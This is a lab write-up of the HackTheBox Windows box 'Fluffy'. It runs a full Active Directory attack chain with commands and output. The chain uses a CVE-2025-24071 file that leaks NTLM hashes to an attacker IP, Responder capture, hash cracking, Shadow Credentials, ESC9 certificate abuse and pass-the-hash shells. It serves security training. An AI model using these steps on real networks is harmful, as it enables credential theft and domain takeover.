Fluffy – HackTheBox Link to heading

  • OS: Windows
  • Difficulty: Easy
  • Platform: HackTheBox

Avatar fluffy


Summary Link to heading

“Fluffy” is an Easy box from HackTheBox platform. We start with provided credentials (assumed breached scenario). The provided user can write files over an SMB share. The system is vulnerable to CVE-2025-24071, a vulnerability that allow us to get the hash of a user that opens a malicious file. Since we have permissions to write files in the SMB share, we put the malicious file there and obtain a hash for a new user; a hash that we are able to crack and pivot to a new user. This new user has GenericAll permissions, which allow us to add ourselves to a group that can perform a Shadow Credentials attack and retrieve the NTLM hash of services accounts. We find that one of the services accounts has GenericWrite over another account that can enroll certificates; this conditions allow us to perform a ESC9 (“escalation 9”), retrieve the NTLM hash for Administrator user and impersonate it.


User Link to heading

Info
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

We start with a quick and silent Nmap scan looking for open TCP ports:

❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.129.226.137

We find multiple ports open. Among them we have: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 LDAP, 445 Server Message Block (SMB), 5985 WinRM (WinRM); and others. We apply some recognition scans over these ports with -sVC flag with Nmap:

❯ sudo nmap -sVC -p53,88,139,389,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49685,49698,49711,49745 10.129.226.137

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 17:38 -04
Nmap scan report for 10.129.226.137
Host is up (0.50s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-26 04:38:11Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T04:39:48+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T04:39:48+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T04:39:48+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-26T04:39:48+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
49745/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-05-26T04:39:12
|_  start_date: N/A
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.68 seconds

Based on open ports (Kerberos, Microsoft RPC, LDAP, SMB) we can guess we are against an Active Directory (AD) environment.

We can use NetExec against SMB service to request some information about the domain:

❯ nxc smb 10.129.226.137

SMB         10.129.226.137  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)

We have a machine name DC01, a domain fluffy.htb and, therefore, an FQDN DC01.fluffy.htb.

Add these names and domain, along with the target IP, to our /etc/hosts file:

❯ echo '10.129.226.137 DC01 DC01.fluffy.htb fluffy.htb' | sudo tee -a /etc/hosts

Since we started with provided credentials for j.fleischman user, check if this user has some interesting shared resources that can read in SMB:

❯ nxc smb 10.129.226.137 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares

SMB         10.129.226.137  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.226.137  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.226.137  445    DC01             [*] Enumerated shares
SMB         10.129.226.137  445    DC01             Share           Permissions     Remark
SMB         10.129.226.137  445    DC01             -----           -----------     ------
SMB         10.129.226.137  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.226.137  445    DC01             C$                              Default share
SMB         10.129.226.137  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.226.137  445    DC01             IT              READ,WRITE
SMB         10.129.226.137  445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.226.137  445    DC01             SYSVOL          READ            Logon server share

We have a non-default shared resource called IT.

Check its content using NetExec as well:

❯ nxc smb 10.129.226.137 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --spider 'IT' --pattern .

SMB         10.129.226.137  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.226.137  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.226.137  445    DC01             [*] Started spidering
SMB         10.129.226.137  445    DC01             [*] Spidering .
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/.. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/Everything-1.4.1.1026.x64 [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/Everything-1.4.1.1026.x64.zip [lastm:'2025-05-16 10:51' size:1827464]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58 [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58.zip [lastm:'2025-05-16 10:51' size:3225346]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/Upgrade_Notice.pdf [lastm:'2025-05-17 10:31' size:169963]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/Everything-1.4.1.1026.x64/. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/Everything-1.4.1.1026.x64/.. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/Everything-1.4.1.1026.x64/everything.exe [lastm:'2025-05-16 10:51' size:2265104]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/Everything-1.4.1.1026.x64/Everything.lng [lastm:'2025-05-16 10:51' size:958342]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/.. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/KeePass.chm [lastm:'2025-05-16 10:51' size:768478]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/KeePass.exe [lastm:'2025-05-16 10:51' size:3305824]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/KeePass.exe.config [lastm:'2025-05-16 10:51' size:763]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/KeePass.XmlSerializers.dll [lastm:'2025-05-16 10:51' size:463264]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/KeePassLibC32.dll [lastm:'2025-05-16 10:51' size:609136]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/KeePassLibC64.dll [lastm:'2025-05-16 10:51' size:785776]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/License.txt [lastm:'2025-05-16 10:51' size:18710]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/ShInstUtil.exe [lastm:'2025-05-16 10:51' size:97128]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/Languages/. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/Languages/.. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/Plugins/. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/Plugins/.. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/XSL/. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/XSL/.. [dir]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/XSL/KDBX_Common.xsl [lastm:'2025-05-16 10:51' size:2732]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/XSL/KDBX_DetailsFull_HTML.xsl [lastm:'2025-05-16 10:51' size:3556]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/XSL/KDBX_DetailsLight_HTML.xsl [lastm:'2025-05-16 10:51' size:3098]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/XSL/KDBX_PasswordsOnly_TXT.xsl [lastm:'2025-05-16 10:51' size:919]
SMB         10.129.226.137  445    DC01             //10.129.226.137/IT/KeePass-2.58/XSL/KDBX_Tabular_HTML.xsl [lastm:'2025-05-16 10:51' size:3100]
SMB         10.129.226.137  445    DC01             [*] Done spidering (Completed in 16.31744623184204)

We have many files. Among them one interesting one is a PDF file called Upgrade_Notice.pdf.

Download this file using NetExec:

❯ nxc smb 10.129.226.137 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --share 'IT' --get-file 'Upgrade_Notice.pdf' 'Upgrade_Notice.pdf'

SMB         10.129.226.137  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.226.137  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.226.137  445    DC01             [*] Copying "Upgrade_Notice.pdf" to "Upgrade_Notice.pdf"
SMB         10.129.226.137  445    DC01             [+] File "Upgrade_Notice.pdf" was downloaded to "Upgrade_Notice.pdf"

We can open this PDF file. It talks about some high-impact vulnerabilities on the system:

Fluffy 1

And they also provide a list of vulnerabilities:

Fluffy 2

One of the vulnerabilities mentioned is CVE-2025-24071 (the second one from the list). This allows an attacker to create a malicious file that performs a spoofing over a network for an unauthorized user. Searching for a Proof of Concept (PoC) for this vulnerability, we find this repository. We clone it and run it:

❯ git clone https://github.com/ThemeHackers/CVE-2025-24071.git -q

❯ cd CVE-2025-24071

❯ python3 exploit.py

✗ Error: No arguments provided
usage: exploit.py [-h] [-f FILE_NAME] [-i IP_ADDRESS] [-afv]

Create an exploit ZIP file or show affected versions

options:
  -h, --help            show this help message and exit
  -f FILE_NAME, --file-name FILE_NAME
                        Name of the library file (without extension)
  -i IP_ADDRESS, --ip-address IP_ADDRESS
                        IP address (e.g., 192.168.1.111)
  -afv, --affected-versions
                        Display affected versions

This exploit does the following: It creates a compressed file (.zip file) that contains a malicious .library-ms file, whose name is specified with -f flag. When opened, this file will send information to the IP set at -i flag, i.e., there we must use our attacker IP.

We run this exploit based on this information:

❯ python3 exploit.py -f 'lib' -i 10.10.16.80

          ______ ____    ____  _______       ___     ___    ___    _____        ___    _  _      ___    ______   __
         /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  | ____|      |__ \  | || |    / _ \  |____  | /_ |
        |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) | | |__    ______ ) | | || |_  | | | |     / /   | |
        |  |       \      /   |   __|  |______/ /  | | | |   / /  |___ \  |______/ /  |__   _| | | | |    / /    | |
        |  `----.   \    /    |  |____       / /_  | |_| |  / /_   ___) |       / /_     | |   | |_| |   / /     | |
         \______|    \__/     |_______|     |____|  \___/  |____| |____/       |____|    |_|    \___/   /_/      |_|


                                                Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
                    by ThemeHackers                                                                                                                                         

Creating exploit with filename: lib.library-ms
Target IP: 10.10.16.80

Generating library file...
✓ Library file created successfully

Creating ZIP archive...
✓ ZIP file created successfully

Cleaning up temporary files...
✓ Cleanup completed

Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.

Where 10.10.16.80 is our attacker machine. This should have generated an exploit.zip file in the current working directory.

Check the content of the generated exploit.zip file with 7z:

❯ 7z l exploit.zip

<SNIP>
   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2025-05-25 18:18:46 .....          364          187  lib.library-ms
------------------- ----- ------------ ------------  ------------------------
2025-05-25 18:18:46                364          187  1 files

We have the generated malicious file inside it.

Therefore, just extract this file decompressing the .zip file:

❯ unzip exploit.zip

Archive:  exploit.zip
  inflating: lib.library-ms

Now, since we will start spoofing the network, use a listener for it such as Responder:

❯ sudo responder -I tun0

and upload the malicious lib.library-ms file to the target machine using NetExec:

❯ nxc smb 10.129.226.137 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --share 'IT' --put-file 'lib.library-ms' 'lib.library-ms'

SMB         10.129.226.137  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.226.137  445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.226.137  445    DC01             [*] Copying lib.library-ms to lib.library-ms
SMB         10.129.226.137  445    DC01             [+] Created file lib.library-ms on \\IT\lib.library-ms

After some seconds, we get an NTLMv2 hash in our Responder listener:

❯ sudo responder -I tun0

<SNIP>
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.226.137
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:0b5e0e5ee8343668:0B9F3CFFB04A0D73E7125D3A53CAA8DF:0101000000000000805013EB9ECDDB01042800BC1C1AFEED0000000002000800580039005900410001001E00570049004E002D00360033004C0039004D0054004300500053004400570004003400570049004E002D00360033004C0039004D005400430050005300440057002E0058003900590041002E004C004F00430041004C000300140058003900590041002E004C004F00430041004C000500140058003900590041002E004C004F00430041004C0007000800805013EB9ECDDB01060004000200000008003000300000000000000001000000002000008E254D416F29E5296AACDAA9FC35B7D17416AFC18A1CCBAA05FD68F28EBA3A070A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380030000000000000000000

We get a hash for p.aguila user.

Save this hash into our attacker machine:

❯ echo -n 'p.agila::FLUFFY:0b5e0e5ee8343668:0B9F3CFFB04A0D73E7125D3A53CAA8DF:0101000000000000805013EB9ECDDB01042800BC1C1AFEED0000000002000800580039005900410001001E00570049004E002D00360033004C0039004D0054004300500053004400570004003400570049004E002D00360033004C0039004D005400430050005300440057002E0058003900590041002E004C004F00430041004C000300140058003900590041002E004C004F00430041004C000500140058003900590041002E004C004F00430041004C0007000800805013EB9ECDDB01060004000200000008003000300000000000000001000000002000008E254D416F29E5296AACDAA9FC35B7D17416AFC18A1CCBAA05FD68F28EBA3A070A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380030000000000000000000' > p_agila_hash

Then, attempt a Brute Force Password Cracking with JohnTheRipper (john) using rockyou.txt dictionary.:

❯ john --wordlist=/usr/share/wordlists/rockyou.txt p_agila_hash --format=netntlmv2

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)
1g 0:00:00:02 DONE (2025-05-25 18:30) 0.4608g/s 2082Kp/s 2082Kc/s 2082KC/s proquis..profesion
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

We get a password for p.agila user.

If we check if these credentials works for SMB we get they are correct:

❯ nxc smb 10.129.226.137 -u 'p.agila' -p 'prometheusx-303'

SMB         10.129.226.137  445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.129.226.137  445    DC01             [+] fluffy.htb\p.agila:prometheusx-303

But, apparently, we don’t have direct access to WinRM service as this new user:

❯ nxc winrm 10.129.226.137 -u 'p.agila' -p 'prometheusx-303'

WINRM       10.129.226.137  5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
WINRM       10.129.226.137  5985   DC01             [-] fluffy.htb\p.agila:prometheusx-303

At this point we can use Bloodhound to map permissions in the domain. For this purpose we use bloodhound-python along with p.agila’s credentials:

❯ bloodhound-python -c ALL -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb -ns 10.129.226.137 --zip

INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 01M 12S
INFO: Compressing output into 20250525184456_bloodhound.zip

This should generate a .zip file in the current working directory.

Upload the generated .zip file to Bloodhound (in my case I will use the Community Edition, or CE). Once uploaded, search for p.agila user and click on Outbound Object Control at the right bottom side. We can then see:

Fluffy 3

We are part of Service Account Managers group. Members of this group have GenericAll permissions over Service Accounts group.

This means that we could add ourselves (we are currently p.agila user) to Service Accounts group. For this purpose we can use bloodyAD:

❯ bloodyAD -d fluffy.htb --host 10.129.226.137 -u 'p.agila' -p 'prometheusx-303' add groupMember 'Service Accounts' 'p.agila'

[+] p.agila added to Service Accounts
Note
There is a task removing users from Service Accounts group. So we might need to run the command from above (to add p.agila to Service Accounts group) every certain amount of time.

Now that p.agila should be member of Service Accounts group, we can see what permissions have members of Service Accounts group. Seraching for this group and clicking again on Outbound Object Control we can see that we have GenericWrite permissions over 3 accounts: ca_svc, winrm_svc and ldap_svc.

Fluffy 4

Since we have GenericWrite permissions, we could attempt a Shadow Credentials to extract NT hashes from these services accounts. We can easily perform this attack using Certipy:

❯ certipy shadow auto -username 'p.agila'@fluffy.htb -p 'prometheusx-303' -account 'ca_svc'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '27a58fc6-bb5b-64c2-74cc-77993a6595bf'
[*] Adding Key Credential with device ID '27a58fc6-bb5b-64c2-74cc-77993a6595bf' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '27a58fc6-bb5b-64c2-74cc-77993a6595bf' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': None

We get the error KRB_AP_ERR_SKEW(Clock skew too great).

We can fix this problem synchronizing our machine time with the target machine time. For this purpose we can use faketime along with the previously used command. We can install it running sudo apt install faketime ntpdate -y in a terminal. Additionally, since we are targeting 3 accounts (ca_svc, winrm_svc and ldap_svc) we can perform this attack in a simple Bash oneliner for these 3 accounts:

❯ for targetUser in ca_svc winrm_svc ldap_svc; do faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" certipy shadow auto -username 'p.agila'@fluffy.htb -p 'prometheusx-303' -account $targetUser; done

Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
<SNIP>
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
<SNIP>
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37

If we search for Remote Management Users group (users that can connect to the victim machine using WinRM service) we find that winrm_svc user is part of it. Since we have its NT hash, we can connect to this service using evil-winrm and a Pass The Hash:

❯ evil-winrm -i fluffy.htb -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>

We can grab the user flag at winrm_svc Desktop.


NT Authority/System - Administrator Link to heading

Since we have a ca_svc user, CA usually stands for Certificate Authority. Therefore, this user could be related to Active Directory Certificate Services (AD CS). Since we have its hash, we could see if we have a misconfigured certificate that allows a privilege escalation. We can use Certipy to request certificates using ca_svc’s hash, along with faketime to avoid errors with Kerberos service:

❯ faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" certipy find -u 'ca_svc'@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.226.137 -vulnerable

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'fluffy-DC01-CA' via CSRA: Could not connect: timed out
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via RRP
[*] Got CA configuration for 'fluffy-DC01-CA'
[*] Saved BloodHound data to '20250526023153_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250526023153_Certipy.txt'
[*] Saved JSON output to '20250526023153_Certipy.json'

But we apparently do not have misconfigured certificates:

❯ cat 20250526023153_Certipy.txt | grep -E 'CA Name|Template Name|ESC'

    CA Name                             : fluffy-DC01-CA

Now, some time ago, for Certified machine, we learned how to abuse ESC9 (Escalation 9) for AD CS. We needed 2 conditions for that:

  1. Control of a user that can enroll certificates (ca_svc should be able to do it).
  2. Control of a user that has write permissions, such as GenericWrite, over the account that can enroll certificates. In our case, p.agila (the impersonated user we have added to Services Accounts group) has GenericWrite permissions over ca_svc (a user, we assume, can enroll certificates). This blog explains how to abuse this escalation in a more detailed way.

First, we need to update the User Principal Name (UPN) to a user we want to impersonate. In our case we want to impersonate Administrator user. For this purpose use Certipy along with faketime:

❯ faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" certipy account update -username 'p.agila'@fluffy.htb -p 'prometheusx-303' -user 'ca_svc' -upn 'Administrator@fluffy.htb'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : Administrator@fluffy.htb
[*] Successfully updated 'ca_svc'

We need the names of certificates in the victim machine. We can request all the certificates in the target machine and read some of them:

❯ faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" certipy find -username 'ca_svc'@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.226.137

<SNIP>
[*] Saved text output to '20250526022820_Certipy.txt'
[*] Saved JSON output to '20250526022820_Certipy.json'

❯ cat 20250526022820_Certipy.txt | grep -E 'CA Name|Template Name|ESC'

    CA Name                             : fluffy-DC01-CA
    <SNIP>
    Template Name                       : UserSignature
    Template Name                       : User

We have many of them. In my case I will use User template since it is a standard one and one of the first ones that is always worth giving it a try. Also the CA name is fluffy-DC01-CA, which we will need later.

Then, as the user that can enroll certificates (ca_svc) who has its UPN modified, we can request User certificate, setting -ca with the value previously found (fluffy-DC01-CA):

❯ faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" certipy req -u 'ca_svc'@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -ca fluffy-DC01-CA -template User

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Administrator@fluffy.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

This should have generated a .pfx file, that is a certificate file that we will use later.

Then, revert the changes made to the user that can enroll certificates (ca_svc). Use again the user that has GenericWrite permissions (p.agila being member of Services Accounts group) over this last user (ca_svc). Restore UPN to its original user/value:

❯ faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" certipy account update -u 'p.agila'@fluffy.htb -p 'prometheusx-303' -user ca_svc -upn ca_svc@fluffy.htb

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'

Here we have set ca_svc’s UPN back to ca_svc@fluffy.htb.

Finally, we can use the generated .pfx file to request the NTLM hash of the targeted user (Administrator):

❯ faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.226.137

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

GG.

We can then use a tool such as impacket-smbexec to connect to the victim machine as nt authority/system user using Administrator’s NT hash through a Pass The Hash (PtH):

❯ impacket-smbexec fluffy.htb/Administrator@DC01.fluffy.htb -hashes ':8da83a3fa618b6e3a00e93f676c92a6e'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami

nt authority\system

We can grab root.txt flag at Administrator’s Desktop.

~Happy Hacking.